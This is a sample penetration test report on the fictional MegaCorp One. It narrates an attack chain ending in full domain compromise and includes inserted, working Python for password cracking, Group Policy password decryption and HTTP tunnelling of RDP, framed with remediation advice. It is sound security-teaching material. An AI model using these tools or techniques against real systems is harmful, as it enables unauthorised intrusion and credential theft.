Sample Penetration Testing Report

Transcript

Penetration Test Report
MegaCorp One
August 10th, 2013

Offensive Security Services, LLC
19706 One Norman Blvd. Suite B #253
Cornelius, NC 28031
United States of America
Tel: 1-402-608-1337
Fax: 1-704-625-3787
Email: [email protected]
Web: http://www.offensive-security.com

PENETRATION TEST REPORT – MEGACORP ONE

Table of Contents
Executive Summary 1
Summary of Results 2
Attack Narrative 3
  Remote System Discovery 3
  Admin Webserver Interface Compromise 6
  Interactive Shell to Admin Server 9
  Administrative Privilege Escalation 12
  Java Client Attacks 13
  Escalation to Local Administrator 15
  Deep Packet Inspection Bypass 16
  Citrix Environment Compromise 20
  Escalation to Domain Administrator 24
Conclusion 28
Recommendations 29
Risk Rating 30
Appendix A: Vulnerability Detail and Mitigation 31
  Risk Rating Scale 31
  Default or Weak Credentials 31
  Password Reuse 32
  Shared Local Administrator Password 32
  Patch Management 33
  DNS Zone Transfer 33
  Default Apache Files 33
Appendix B: About Offensive Security 34

PTR-20130513 Copyright © 2013 Offensive Security Services LLC. All rights reserved. Page i of 34

Executive Summary

Offensive Security was contracted by MegaCorp One to conduct a penetration test in order to determine its exposure to a targeted attack. All activities were conducted in a manner that simulated a malicious actor engaged in a targeted attack against MegaCorp One with the goals of:

o Identifying if a remote attacker could penetrate MegaCorp One's defenses
o Determining the impact of a security breach on:
  o Confidentiality of the company's private data
  o Internal infrastructure and availability of MegaCorp One's information systems

Efforts were placed on the identification and exploitation of security weaknesses that could allow a remote attacker to gain unauthorized access to organizational data. The attacks were conducted with the level of access that a general Internet user would have. The assessment was conducted in accordance with the recommendations outlined in NIST SP 800-115 [1], with all tests and actions being conducted under controlled conditions.

[1] http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf

Summary of Results

Initial reconnaissance of the MegaCorp One network resulted in the discovery of a misconfigured DNS server that allowed a DNS zone transfer. The results provided us with a listing of specific hosts to target for this assessment. An examination of these hosts revealed a password-protected administrative interface on MegaCorp One's webserver. After creating a custom wordlist using terms identified on the MegaCorp One website, we were able to gain access to this interface by uncovering the password via brute force.

An examination of the administrative interface revealed that it was vulnerable to a remote code injection vulnerability, which was used to obtain interactive access to the underlying operating system. This initial compromise was escalated to administrative access due to a lack of appropriate system updates on the webserver.

After a closer examination of the compromised webserver, we discovered that it utilizes a Java applet for MegaCorp One's administrators. We added a malicious payload to this applet, which gave us interactive access to workstations used by MegaCorp One's administrators.

Using the compromised webserver as a pivot point, along with passwords recovered from it, we were able to target previously inaccessible internal resources. This resulted in Local Administrator access to numerous internal Windows hosts, complete compromise of a Citrix server, and full administrative control of the Windows Active Directory infrastructure. Existing network traffic controls were bypassed through encapsulation of malicious traffic into allowed protocols.

Attack Narrative

Remote System Discovery

For the purposes of this assessment, MegaCorp One provided minimal information outside of the organizational domain name: megacorpone.com. The intent was to closely simulate an adversary without any internal information. To avoid targeting systems that were not owned by MegaCorp One, all assets identified were submitted for ownership verification before any attacks were conducted.

In an attempt to identify the potential attack surface, we examined the name servers of the megacorpone.com domain name (Figure 1).

Figure 1 – Information gathering for megacorpone.com reveals three active name servers.

With the name servers identified, we attempted to conduct a zone transfer. We found that ns2.megacorpone.com was vulnerable to a full DNS zone transfer. This misconfiguration provided us with a listing of the hostnames and associated IP addresses, which could be used to further target the organization (Figure 2).

Zone transfers can provide attackers with detailed information about the capabilities of the organization. It can also leak information about the network ranges owned by the organization. Please see Appendix A for more information.

Figure 2 – A misconfigured name server allows a full and unrestricted DNS zone transfer.

The list of identified hosts was then submitted to MegaCorp One for verification, which confirmed that the entire 50.7.67.x network range should be included in the assessment scope. These systems were scanned to enumerate any running services. All identified services were examined in detail to determine their potential exposure to a targeted attack.
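The two steps above (turn the zone transfer into a host list, then keep only what the client has verified as in scope) as an added example; this is editor-supplied code, not a tool from the report. It parses the record format `dig` prints for an AXFR; the zone contents, hostnames and addresses in the sample are constructed for illustration and are not MegaCorp One's real zone data.

```python
"""Added example, not part of the Offensive Security report: turn the output of a
`dig <zone> axfr` zone transfer into a target list and split it by the scope the
client verified. Hostnames and addresses below are constructed for illustration."""
import ipaddress
import re

# Constructed sample of `dig @ns2.megacorpone.com megacorpone.com axfr` output.
# The records are illustrative; they are not the report's actual zone data.
SAMPLE_AXFR = """\
; <<>> DiG 9.8.1 <<>> @ns2.megacorpone.com megacorpone.com axfr
megacorpone.com.          300  IN  SOA    ns1.megacorpone.com. admin.megacorpone.com. 2013081001 3600 900 604800 300
megacorpone.com.          300  IN  NS     ns1.megacorpone.com.
megacorpone.com.          300  IN  NS     ns2.megacorpone.com.
admin.megacorpone.com.    300  IN  A      50.7.67.181
www.megacorpone.com.      300  IN  A      50.7.67.179
mail.megacorpone.com.     300  IN  A      50.7.67.186
intranet.megacorpone.com. 300  IN  A      10.7.0.22
vpn.megacorpone.com.      300  IN  CNAME  mail.megacorpone.com.
"""

# owner  ttl  IN  type  rdata  (dig prints the class as IN for these zones)
RR_RE = re.compile(r"^(?P<name>\S+)\s+(?P<ttl>\d+)\s+IN\s+(?P<type>[A-Z]+)\s+(?P<rdata>.+)$")


def parse_axfr(text):
    """Return (owner, rtype, rdata) for every resource record in dig AXFR output,
    skipping comment lines and the trailing status lines dig prints."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RR_RE.match(line)
        if m:
            records.append((m["name"].rstrip("."), m["type"], m["rdata"].strip()))
    return records


def split_by_scope(records, scope_cidrs):
    """Map hostname -> set(ip) for A/AAAA records, split into in-scope hosts (inside
    one of scope_cidrs) and out-of-scope hosts that must not be touched."""
    nets = [ipaddress.ip_network(c) for c in scope_cidrs]
    in_scope, out_of_scope = {}, {}
    for name, rtype, rdata in records:
        if rtype not in ("A", "AAAA"):
            continue
        addr = ipaddress.ip_address(rdata)
        bucket = in_scope if any(addr in n for n in nets) else out_of_scope
        bucket.setdefault(name, set()).add(str(addr))
    return in_scope, out_of_scope


def observed_networks(records, prefix=24):
    """Distinct /prefix networks that appear in A records: the list to hand to the
    client for ownership verification before anything is scanned."""
    nets = set()
    for _, rtype, rdata in records:
        if rtype == "A":
            nets.add(str(ipaddress.ip_network(f"{rdata}/{prefix}", strict=False)))
    return sorted(nets)


if __name__ == "__main__":
    recs = parse_axfr(SAMPLE_AXFR)
    print("networks to verify:", observed_networks(recs))
    ok, skip = split_by_scope(recs, ["50.7.67.0/24"])
    for host, ips in sorted(ok.items()):
        print("in scope :", host, ",".join(sorted(ips)))
    for host, ips in sorted(skip.items()):
        print("EXCLUDED :", host, ",".join(sorted(ips)))
```

The point of the split is the ownership rule stated above: a zone can (and here does) name hosts on address space the client never confirmed, such as RFC 1918 ranges leaked into a public zone, and those are reported, not scanned.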

Through a combination of DNS enumeration techniques and network scanning, we were able to build a composite that we feel reflects MegaCorp One's network. The target network is shown below in Figure 3. Additional details regarding controls such as deep packet inspection were discovered later in the assessment but are included here for completeness.

Figure 3 – Target Network

Admin Webserver Interface Compromise

The admin.megacorpone.com webserver was found to be running an Apache webserver on port 81. Accessing the root URL of this site resulted in the display of a blank page. We next conducted a quick enumeration scan of the system looking for common directories and files (Figure 4).

Figure 4 – Enumeration of the admin.megacorpone.com host partially discloses the webserver's folder structure.

The scan results revealed that, along with common Apache default files (please see Appendix A for more information), there was an "/admin" directory that was only accessible after authentication (Figure 5).

Figure 5 – Access to the "admin" folder is password-protected.

To prepare a targeted brute-force attempt against this system, we compiled a custom dictionary file based on the content of the www.megacorpone.com website. The initial dictionary consisted of 331 custom words, which were then put through several rounds of permutations and substitutions to produce a final dictionary of 16,201 words. This dictionary file was used along with the username file against the "admin" protected section of the site.

Figure 6 – Using a custom word dictionary it is possible to discover the administrative password for the "admin" folder.

This brute-force attack uncovered a password of "nanotechnology1" for the admin user. We were able to leverage these credentials to successfully gain unauthorized access to the protected portion of the website (Figure 6). Please see Appendix A for more information on the exploited vulnerability.

The administrative portion of the website contained what appeared to be an instance of SQLite Manager (Figure 7), a web interface which was accessible without any additional credentials. Utilizing this interface, we found the database that supported an instance of phpSQLiteCMS [2].

Figure 7 – An instance of SQLite Manager is found to be running on the compromised webserver.

[2] http://phpsqlitecms.net/

The interface gave us direct access to the data and the ability to extract a list of users on the system with the associated password hash values (Figure 8).

Figure 8 – Lack of additional access controls allows an attacker to retrieve usernames and password hashes from the "userdata" database.

After examination of the values, we found that the hashes did not conform to any standard format. Using a copy of the "phpsqlitecms" software, we examined the source code to determine how exactly this value is produced. Through this process we were able to identify the function responsible for the hashing of the account passwords.

Figure 9 – Source code review leads to the discovery of the password hash generation algorithm.

With the newly acquired knowledge of the password hashing format and the use of a randomly-generated 10 character salt value, we were able to easily convert the recovered hashes into their salted SHA1 equivalent and conduct a brute-force attack. This effort resulted in the recovery of two plaintext passwords. Although these values were not immediately useful, they were retained in the hope that they may have been re-used on other systems within the organization.
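The two pieces of tooling this and the previous subsection describe, a site-specific wordlist put through permutation and substitution rounds, and a dictionary attack against hashes that reduce to salted SHA1, as one added example. This is editor-supplied code, not the team's actual scripts, and the storage layout it assumes (the 10-character salt followed by the hex SHA1 of salt plus password) is an assumption made for the example; the report only says the salt is 10 random characters and that the hashes convert to a salted SHA1 form. The mangling rules are likewise an illustration of the kind of permutation used, not the report's exact rules, and the sample user rows are constructed.

```python
"""Added example, not part of the Offensive Security report: build a mangled
wordlist from site-specific terms, then run it against salted SHA1 hashes
recovered from a CMS user table. The storage layout used here (10-char salt
followed by hex sha1(salt + password)) is an ASSUMPTION for the example; the
report only states that the salt is 10 random characters and that the hashes
reduce to salted SHA1. Sample users and passwords are constructed."""
import hashlib
import os

SALT_LEN = 10
LEET = {"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"}
SUFFIXES = ["", "1", "123", "2013", "!"]


def mangle(word):
    """Case, leetspeak and suffix variants of one base term."""
    base = word.lower()
    forms = {base, base.capitalize(), base.upper(),
             "".join(LEET.get(c, c) for c in base)}
    return {f + s for f in forms for s in SUFFIXES}


def build_wordlist(terms, join_pairs=True):
    """All variants of every term, plus (optionally) concatenations of two terms,
    de-duplicated and sorted so the list is stable between runs."""
    words = set()
    terms = [t.lower() for t in terms]
    for t in terms:
        words |= mangle(t)
    if join_pairs:
        for a in terms:
            for b in terms:
                if a != b:
                    words |= mangle(a + b)
    return sorted(words)


def stored_hash(password, salt=None):
    """Assumed CMS layout: salt || hex(sha1(salt || password))."""
    if salt is None:
        salt = os.urandom(5).hex()  # 10 hex characters
    assert len(salt) == SALT_LEN
    return salt + hashlib.sha1((salt + password).encode()).hexdigest()


def to_hashcat_line(user, value):
    """Rewrite one stored value as user:hash:salt, the form a generic
    sha1($salt.$pass) cracker mode expects (hashcat -m 120 with --username)."""
    salt, digest = value[:SALT_LEN], value[SALT_LEN:]
    return f"{user}:{digest}:{salt}"


def crack(userdata, wordlist):
    """Dictionary attack: hash every candidate with each user's own salt."""
    found = {}
    for user, value in userdata.items():
        salt, digest = value[:SALT_LEN], value[SALT_LEN:]
        for cand in wordlist:
            if hashlib.sha1((salt + cand).encode()).hexdigest() == digest:
                found[user] = cand
                break
    return found


# Constructed sample "userdata" rows (passwords chosen for the example only).
SAMPLE_USERDATA = {
    "admin": stored_hash("nanotechnology1", "a1b2c3d4e5"),
    "jdoe": stored_hash("Megacorp2013", "0f9e8d7c6b"),
    "rsmith": stored_hash("correct horse battery", "1122334455"),  # not in list
}

if __name__ == "__main__":
    wl = build_wordlist(["nanotechnology", "megacorp", "research"])
    print(f"{len(wl)} candidates")
    print(crack(SAMPLE_USERDATA, wl))
```

The conversion step is the one that matters in practice: once each row is split into digest and salt, the pairs can be handed to an ordinary cracker instead of the loop in `crack()`, which is only there to show the salt being applied per user. Note that the per-user salt defeats precomputation but not a targeted dictionary, which is why a 16,201-word site-specific list was enough here.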

Interactive Shell to Admin Server

The previously discovered SQLite Manager software was found to be vulnerable to a well-known code injection vulnerability [3]. Successful exploitation of this vulnerability results in shell access to the underlying system in the context of the webserver user. Using a modified public exploit, we were able to obtain limited interactive access to the admin.megacorpone.com webserver. Please see Appendix A for more information.

Figure 10 – A publicly available SQLite Manager exploit is used to gain unauthorized access on the admin.megacorpone.com host.

[3] http://www.exploit-db.com/exploits/24320/

Figure 11 – Control of the vulnerable server is limited to the context of the www-data user.

The public version of the exploit targets a slightly different version of SQLite Manager than the one deployed by MegaCorp One. Although the deployed version of the software is vulnerable to the same underlying issues, the exploit does not successfully run without modification. We were able to extend the original exploit to support HTTP authentication and customize it for the updated version. A copy of this updated exploit will be provided separately from this report.

The extent of compromise at this point can be best visualized in Figure 12.

Figure 12 – Web Server Compromise

Administrative Privilege Escalation

With interactive access to the underlying operating system of the administrative webserver obtained, we continued with the examination of the system, searching for ways to escalate privileges to the administrative level. We found that the system was vulnerable to a local privilege escalation exploit [4], which we were able to utilize successfully. Please see Appendix A for more information.

Figure 13 – A local privilege escalation exploit is used to take advantage of an unpatched host and gain root-level access.

The use of this exploit was made partially possible due to the inclusion of developer tools on the vulnerable system. If these tools were not present on the system, it would still have been possible to exploit it successfully, although the difficulty in doing so would have been increased.

In its current configuration, the webserver represents an internal attack platform for a malicious party. With the ability to gain full administrative access, a malicious party could utilize this vulnerable system for a multitude of purposes, ranging from attacks against MegaCorp One itself to attacks against its customers. It's highly likely that attackers would leverage this system for both purposes.

[4] http://www.exploit-db.com/exploits/18411/

Java Client Attacks

Using the administrative access to the system, we conducted an analysis of the exploited system. This resulted in the discovery of a private section of the web site that serves a Java applet only to specific workstations. The network range in question was later discovered to be the management network for MegaCorp One.

Figure 14 – htaccess rules on the system reveal an additional subnet on the compromised network.

Through examination of the log files and the Java applet present on the system, we found that the applet provided administrative functionality to a subset of internal users of MegaCorp One. This was advantageous to us as attackers, as it provided us with a potential path to internal systems that otherwise were not easily accessible.

Upon obtaining permission from MegaCorp One, we added an additional applet to be downloaded by clients. The theory of this attack was that clients would access the trusted applet, allow it to run, and provide us with direct client access to additional hosts. This is a derivative of a common social engineering attack in which the victim is manipulated into running a malicious applet. In this case, however, no effort was required to mislead the victim as the applet is already regarded as trusted.

This attack worked as intended, providing us with access to an additional client system.

Figure 15 – Using a malicious Java applet it is possible to exploit a host on the management subnet.

With this compromise in place, we obtained access to systems in the management network as indicated in Figure 16.

Figure 16 – Successful Java applet attack compromises the MegaCorp One management subnet.

Escalation to Local Administrator

The access provided by the Java applet attack was limited to the level of a standard user. To maximize the impact of the compromise we wanted to escalate access to the level of Domain Administrator. As the first step, we needed to obtain local administrative access. In an effort to accomplish this, we examined the compromised system to identify how it could be leveraged. Using this approach we found a Group Policy Preferences file on the system that allowed us to decrypt the local administrative password [5][6]. Please see Appendix A for more information.

Figure 17 – Using the newly gained access it is possible to retrieve the Groups.xml file from a domain controller.

[5] http://msdn.microsoft.com/en-us/library/cc422924.aspx
[6] http://blogs.technet.com/b/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx
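The check a defender (or an assessor with a domain user account) wants at this point is whether SYSVOL contains any Group Policy Preferences file carrying a cpassword attribute, as the Groups.xml above did. The following is an added example written for this page, not a tool from the report: it parses the GPP XML format, reports every cpassword with the account and change date an auditor needs, and can decrypt a value with the AES-256 key Microsoft published in the documentation cited at footnote 5. The Groups.xml sample is constructed and its cpassword is a placeholder rather than a real ciphertext; decryption uses the third-party `cryptography` package, which is an assumption about the environment and is imported only when needed.

```python
"""Added example, not part of the Offensive Security report: audit a SYSVOL tree for
Group Policy Preferences files that carry a cpassword attribute (Groups.xml, but also
Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml), and optionally decrypt
them with the AES-256 key Microsoft published (footnote 5). The XML below is a
constructed sample; the cpassword value in it is a placeholder, not a real ciphertext."""
import base64
import os
import xml.etree.ElementTree as ET

# Key published by Microsoft in the GPP cpassword documentation (MSDN cc422924).
GPP_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)

SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)"
        image="2" changed="2013-07-30 09:12:44" uid="{5D6A1C8E-0000-4000-8000-000000000001}">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="PLACEHOLDERcpasswordVALUE" changeLogon="0" noChange="1"
        neverExpires="1" acctDisabled="0" userName="Administrator (built-in)"/>
  </User>
</Groups>
"""


def find_cpasswords(xml_text, source="<memory>"):
    """Every element carrying a non-empty cpassword attribute, with the fields an
    auditor needs to triage it (which account, which file, when it was last changed)."""
    hits = []
    root = ET.fromstring(xml_text)
    for item in root:                       # <User>, <NTService>, <Task>, ...
        changed = item.get("changed", "")
        for el in item.iter():
            cp = el.get("cpassword")
            if cp:
                hits.append({
                    "file": source,
                    "element": el.tag,
                    "account": el.get("userName") or el.get("accountName")
                               or el.get("runAs") or item.get("name", ""),
                    "changed": changed,
                    "cpassword": cp,
                })
    return hits


def scan_sysvol(root_dir):
    """Walk a SYSVOL copy (e.g. a mounted \\\\dc\\SYSVOL share) and collect hits."""
    hits = []
    for dirpath, _, files in os.walk(root_dir):
        for fn in files:
            if fn.lower().endswith(".xml"):
                path = os.path.join(dirpath, fn)
                try:
                    with open(path, encoding="utf-8-sig") as fh:
                        hits += find_cpasswords(fh.read(), path)
                except ET.ParseError:
                    pass
    return hits


def decrypt_cpassword(cpassword):
    """AES-256-CBC, zero IV, PKCS#7 padding, UTF-16LE plaintext; the stored value is
    base64 with its '=' padding stripped. Needs the third-party `cryptography`
    package, imported lazily so the audit part works without it."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    dec = Cipher(algorithms.AES(GPP_KEY), modes.CBC(b"\x00" * 16)).decryptor()
    padded = dec.update(raw) + dec.finalize()
    return padded[: -padded[-1]].decode("utf-16-le")


if __name__ == "__main__":
    for h in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(f"{h['file']}: {h['element']} {h['account']!r} changed {h['changed']}")
```

Because every authenticated domain user can read SYSVOL and the key is public, a hit from `scan_sysvol()` should be treated as the password being known to the whole domain, not as an encrypted secret; the "changed" timestamp tells you how long that has been true.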

Figure 18 – Encrypted local administrator password is found in the Groups.xml file.

Figure 19 – Using the encryption key published by Microsoft, the encrypted password is easily decrypted.

Using the recovered plaintext password, we were able to gain local administrative access to the compromised client.

Deep Packet Inspection Bypass

While trying to establish additional layers of access into the compromised system, we encountered aggressive egress filtering. This was first encountered while trying to establish an encrypted outbound tunnel for the Microsoft Remote Desktop Protocol.

Figure 20 – Initial attempts to establish an outbound tunnel for RDP were blocked by the egress filtering systems.

Additionally, we discovered network protocol enforcement as we attempted to connect to the attacker SSH server on port 80. To bypass this, we created a tunnel within the existing meterpreter session to allow us to access Windows file sharing from the attacker system. This was utilized to run a Windows command shell on the compromised host as the local administrative user. With this shell, we executed an additional meterpreter payload.

Figure 21 – Port forwarding through the initial meterpreter session is established in order to achieve direct access to the compromised management host.

Figure 22 – Newly established connection is used to gain an administrative shell on the compromised management host.

Figure 23 – Local Administrator access is used to establish a meterpreter shell on host 10.7.0.22.

With the new meterpreter shell in place, we then utilized HTTP-Tunnel [7], an open source utility that encapsulates arbitrary traffic within the HTTP payload. We used the newly established "http tunnel" to encapsulate a remote desktop connection between the attacker and the compromised client. This allowed us to obtain full graphical access to the compromised client system. The remote desktop session was established using the password for user "mike", which was discovered to be re-used from the compromised SQLite Manager application. Please see Appendix A for more information.

Figure 24 – Remote Desktop access is established by encapsulating the previously filtered protocol through an http tunnel.

At this point, the external perimeter of the MegaCorp One network was fully compromised, as shown in Figure 25. The virtual equivalent of console access to a computer within the MegaCorp One trusted network environment had been obtained. It should be noted that the current access to the Windows network was limited to a non-privileged domain user account and a local administrator account.

[7] http://http-tunnel.sourceforge.net/
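What the egress filter actually saw, as an added example: a minimal version of the encapsulation described above with both ends of the exchange. This is editor-supplied code, not httptunnel's own implementation (which has its own framing); it exists to show why a filter that only checks "is this HTTP" passes the tunnel, and what an inspecting proxy would have to look at instead. The sample payload is a constructed RDP connection request; the hostname and path in the frames are illustrative.

```python
"""Added example, not part of the Offensive Security report or of httptunnel itself:
a minimal version of the encapsulation httptunnel performs, with both ends of the
exchange. encode_frame() wraps one chunk of the tunnelled stream (here a constructed
RDP connection request) in a syntactically valid HTTP POST; FrameDecoder unwraps frames
on the far side regardless of how TCP split them. body_looks_binary() is the kind of
check an inspecting proxy would need to add, since the framing alone passes a
"must look like HTTP" filter. Hostname and path are illustrative."""
import re

HEADER_END = b"\r\n\r\n"
CONTENT_LENGTH = re.compile(r"^Content-Length:\s*(\d+)\s*$", re.M | re.I)

# Constructed sample payload: a TPKT/X.224 RDP connection request as a client sends it.
SAMPLE_RDP_CR = bytes.fromhex("030000130ee000000000000100080003000000")


def encode_frame(payload, host="www.megacorpone.com", path="/index.php"):
    """Wrap one chunk of tunnelled bytes as an HTTP POST body."""
    header = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: application/octet-stream\r\n"
        f"Content-Length: {len(payload)}\r\n\r\n"
    )
    return header.encode("ascii") + payload


class FrameDecoder:
    """Receiving end: feed() takes whatever recv() returned and yields every
    complete body it has accumulated, holding partial frames for the next call."""

    def __init__(self):
        self.buf = b""

    def feed(self, data):
        self.buf += data
        bodies = []
        while True:
            end = self.buf.find(HEADER_END)
            if end < 0:
                break                                   # header not complete yet
            m = CONTENT_LENGTH.search(self.buf[:end].decode("latin-1"))
            if not m:
                raise ValueError("frame without Content-Length")
            start, length = end + len(HEADER_END), int(m.group(1))
            if len(self.buf) < start + length:
                break                                   # body not complete yet
            bodies.append(self.buf[start:start + length])
            self.buf = self.buf[start + length:]
        return bodies


def body_looks_binary(payload, threshold=0.3):
    """Inspection heuristic: share of non-printable bytes in a request body.
    Real web forms and JSON sit near 0; an encapsulated RDP/SSH stream is far above."""
    if not payload:
        return False
    nonprint = sum(1 for b in payload if b < 9 or 13 < b < 32 or b > 126)
    return nonprint / len(payload) > threshold


if __name__ == "__main__":
    wire = encode_frame(SAMPLE_RDP_CR) + encode_frame(b"user=mike&page=1")
    dec = FrameDecoder()
    got = []
    for i in range(0, len(wire), 7):                   # emulate small TCP reads
        got += dec.feed(wire[i:i + 7])
    for body in got:
        print(len(body), "bytes, binary:", body_looks_binary(body))
```

The decoder buffers across reads because a protocol-enforcing device does the same thing: it only ever sees well-formed requests with a declared length. The body heuristic is deliberately crude; in a real deployment the equivalent signal is a long-lived connection of many small POSTs with opaque bodies to a host that otherwise serves a normal site, and that is what the network-segmentation recommendation later in the report is meant to contain.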

Figure 25 – Compromise of the MegaCorp One network has reached into the network management subnet.

Citrix Environment Compromise

Using remote desktop access into the internal network, we proceeded to explore the network in search of high value targets. One such target appeared to be a Citrix server, which was set as the homepage on the compromised host. Using the same credentials that were utilized to establish the remote desktop connection, we were able to successfully login to this Citrix environment.

Figure 26 – A Citrix server offering only Internet Explorer was discovered on the MegaCorp One network.

This Citrix environment exposed "Internet Explorer" as the only available application. This is a configuration commonly utilized by many organizations to limit access to the underlying operating system of the Citrix server. It is important to note that many methods exist to bypass this. In this case, we utilized the "Save" dialog window to create a batch file that would provide us with a PowerShell interface. This is possible as the "Save" dialog operates in much the same manner as a standard "Windows Explorer" file management window.

Figure 27 – Using the Save dialog, it is possible to bypass some of the restrictions imposed by the Citrix environment.

Figure 28 – A batch file invoking the PowerShell application is created on the Citrix server.

Figure 29 – Citrix restriction is bypassed, resulting in the execution of PowerShell.

The ability to use PowerShell was then utilized to download a malicious payload, which would provide us with a meterpreter session to the underlying Citrix server.

Figure 30 – PowerShell functionality allows an end-user to retrieve files from arbitrary sources, including remote internet locations.

The ability to utilize the "Save" dialog to run arbitrary executable programs was combined with the previously discovered local administrator password, allowing us to execute programs in the context of the local administrator. This allowed us to gain full administrative control of the Citrix system. Please see Appendix A for more information.

Figure 31 – Password re-use allows the attackers to execute a malicious executable with administrative privileges.

Figure 32 – Complete compromise of the Citrix server is achieved.

Figure 33 – An additional host in the network management subnet has been compromised.

Escalation to Domain Administrator

With the Citrix server compromised, we made an attempt to capture passwords from memory. A Citrix server is an ideal candidate for this attack vector, as it typically operates for long periods of time without reboots and services a large number of users.

To capture passwords from memory, we utilized the Windows Credential Editor tool [8] due to its ability to run on 64 bit systems without causing adverse effects.

[8] http://www.ampliasecurity.com/research/wcefaq.html

Figure 34 – Windows Credentials Editor is used to retrieve plaintext passwords from the Citrix server.

This revealed multiple passwords, including a Windows domain administrator account. Please see Appendix A for more information. In order to validate the newly recovered credentials, we successfully created a new remote desktop session to the Citrix server using the domain administrator credentials.

Figure 35 – Domain Administrator credentials are validated against the Citrix host.

At this point, full control of the Windows domain had been obtained. A malicious attacker would have multiple tools at their disposal, including:

o Utilization of Group Policy to deploy backdoor software on Windows systems.
o Complete exfiltration of all data stored on any system that uses Windows authentication.
o Destruction of any and all network resources.
o Targeted attacks against any and all employees of MegaCorp One, through the use of information gathering tools such as keystroke loggers to identify personal information.
o Leveraging this systemic access to conduct attacks against MegaCorp One suppliers and partners that maintain a trust relationship with the company.

It was determined that while these steps would be possible, they would be considered outside the scope of the current engagement. It was demonstrated that a total compromise of the MegaCorp One domain had been accomplished with a complete loss of integrity for all local systems.

Figure 36 – Full Domain Compromise

Conclusion

MegaCorp One suffered a series of control failures, which led to a complete compromise of critical company assets. These failures would have had a dramatic effect on MegaCorp One operations if a malicious party had exploited them. Current policies concerning password reuse and deployed access controls are not adequate to mitigate the impact of the discovered vulnerabilities.

The specific goals of the penetration test were stated as:

o Identifying if a remote attacker could penetrate MegaCorp One's defenses
o Determining the impact of a security breach on:
  o Confidentiality of the company's information
  o Internal infrastructure and availability of MegaCorp One's information systems

These goals of the penetration test were met. A targeted attack against MegaCorp One can result in a complete compromise of organizational assets. Multiple issues that would typically be considered minor were leveraged in concert, resulting in a total compromise of MegaCorp One's information systems. It is important to note that this collapse of the entire MegaCorp One security infrastructure can be greatly attributed to insufficient access controls at both the network boundary and host levels. Appropriate efforts should be undertaken to introduce effective network segmentation, which could help mitigate the effect of cascading security failures throughout the MegaCorp One infrastructure.

Recommendations

Due to the impact to the overall organization as uncovered by this penetration test, appropriate resources should be allocated to ensure that remediation efforts are accomplished in a timely manner. While a comprehensive list of items that should be implemented is beyond the scope of this engagement, some high level items are important to mention.

Offensive Security recommends the following:

1. Ensure that strong credentials are used everywhere in the organization. The compromise of MegaCorp One systems was drastically impacted by the use of weak passwords as well as the reuse of passwords across systems of differing security levels. NIST SP 800-118 [9] is recommended for guidelines on operating an enterprise password policy. While this issue was not widespread within MegaCorp One, it was still an issue and should be addressed.

2. Establish trust boundaries. Create logical boundaries of trust where appropriate on the internal network. Each logical trust segment should be able to be compromised without the breach cascading to other segments. This should include the use of unique administrative accounts so that a compromised system in one segment cannot be used in other locations.

3. Implement and enforce change control across all systems: Misconfiguration and insecure deployment issues were discovered across the various systems. The vulnerabilities that arose can be mitigated through the use of change control processes on all server systems.

4. Implement a patch management program: Operating a consistent patch management program per the guidelines outlined in NIST SP 800-40 [10] is an important component in maintaining good security posture. This will help to limit the attack surface that results from running unpatched internal services.

5. Conduct regular vulnerability assessments. As part of an effective organizational risk management strategy, vulnerability assessments should be conducted on a regular basis. Doing so will allow the organization to determine if the installed security controls are properly installed, operating as intended, and producing the desired outcome. Please consult NIST SP 800-30 [11] for guidelines on operating an effective risk management program.

[9] http://csrc.nist.gov/publications/drafts/800-118/draft-sp800-118.pdf
[10] http://csrc.nist.gov/publications/nistpubs/800-40-Ver2/SP800-40v2.pdf
[11] http://csrc.nist.gov/publications/PubsDrafts.html#SP-800-30-Rev.%201

Risk Rating

The overall risk identified to MegaCorp One as a result of the penetration test is High. A direct path from external attacker to full system compromise was discovered. It is reasonable to believe that a malicious entity would be able to successfully execute an attack against MegaCorp One through targeted attacks.

Appendix A: Vulnerability Detail and Mitigation

Risk Rating Scale

In accordance with NIST SP 800-30, exploited vulnerabilities are ranked based upon likelihood and impact to determine overall risk.

Default or Weak Credentials

Rating: High

Description: An externally exposed administrative interface is only protected with a weak password.

Impact: Using common enumeration and brute-forcing techniques, it is possible to retrieve the administrative password for the SQLite Manager web interface. Due to the lack of any additional authentication mechanisms, it is also possible to retrieve all user password hashes in the underlying database. Successful retrieval of plaintext passwords could allow further compromise of the target environment if password reuse is found to exist.

Remediation: Ensure that all administrative interfaces are protected with complex passwords or passphrases. Avoid use of common or business related words, which could be found or easily constructed with the help of a dictionary. Rate-limiting or locking out repeated failed logins on the interface would also have slowed the 16,201-word dictionary attack described in the narrative, and the SQLite Manager application behind the protected folder should require its own authentication rather than relying solely on the webserver's.

Password Reuse

Rating: High

Description: MegaCorp One user "mike" was found to be reusing credentials for the SQLite Manager application and his Windows domain access.

Impact: Password reuse in general is a practice which should be highly discouraged and prevented to the extent possible. In this case, the impact of the vulnerability is amplified by the fact that an external attacker indirectly compromised a valid set of internal Windows domain credentials. This compromise potentially allows a substantial increase in the attack surface.

Remediation: Update the password management policies to enforce the use of strong, unique passwords for all disparate services. The use of password managers should be encouraged to more easily allow employees to utilize unique passwords across the various systems.

Shared Local Administrator Password

Rating: High

Description: A number of MegaCorp One hosts are provisioned with the same local administrator password.

Impact: MegaCorp One uses a Group Policy to set a local administrator password on all hosts within the scope of the GPO. Using the same local administrator password on corporate systems allows an attacker with appropriate access to utilize the well-known "pass-the-hash" attack vector. It allows an attacker to successfully authenticate on all hosts that share the same password, using only the retrieved password hash. As such, the attack does not rely on successful decryption of the hash, and it significantly increases the security breach footprint.

